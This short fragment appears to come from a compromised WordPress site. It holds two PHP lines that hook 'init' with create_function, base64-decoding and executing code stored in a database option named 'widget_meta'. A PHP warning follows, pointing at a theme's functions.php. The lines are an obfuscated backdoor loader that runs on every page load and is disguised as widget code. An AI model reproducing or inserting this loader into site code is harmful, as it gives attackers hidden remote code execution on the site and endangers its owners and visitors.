add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
Warning: Cannot modify header information - headers already sent by (output started at /homepages/19/d528891113/htdocs/clickandbuilds/WordPress/MyCMS2/wp-content/themes/GraysHandyman/functions.php:79) in /homepages/19/d528891113/htdocs/clickandbuilds/WordPress/MyCMS2/wp-includes/pluggable.php on line 1128